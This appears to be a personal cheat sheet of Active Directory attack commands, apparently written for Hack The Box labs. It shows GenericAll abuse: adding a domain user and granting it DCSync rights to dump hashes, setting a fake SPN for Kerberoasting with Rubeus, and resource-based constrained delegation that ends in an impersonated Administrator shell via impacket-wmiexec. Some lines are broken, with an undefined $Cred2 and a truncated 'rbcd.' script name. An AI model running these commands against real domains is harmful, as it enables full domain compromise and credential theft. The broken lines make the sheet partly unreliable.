generic-all

Creating a new user and assign DCSync permission to it.

Create new user

net user hack password123 /add /domain

Using damundsen user (after abusing 'force change password' got damundsen user) #psobject

$SecPassword = ConvertTo-SecureString 'password123' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('htb\hack', $SecPassword)

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members

Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'hack' -Credential $Cred2 -Verbose

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hack -Rights DCSync

Now dump hashes via impacket-secretsdump

Create a fake SPN

Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Kerberoasting with Rubeus

.\Rubeus.exe kerberoast /user:<username> /nowrap

Create a fake computer object

New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force)

Modify the DC's delegation settings

python3 rbcd. -t dc.support.htb -dc-ip dc.support.htb -f FAKE01 -u support -p 'password'

Get kerberos ticket

impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip dc.support.htb 'support.htb/FAKE01$:Passw0rd!'

Login

export KRB5CCNAME=Administrator.ccache

impacket-wmiexec -k -no-pass dc.support.htb

Last updated 21 hours ago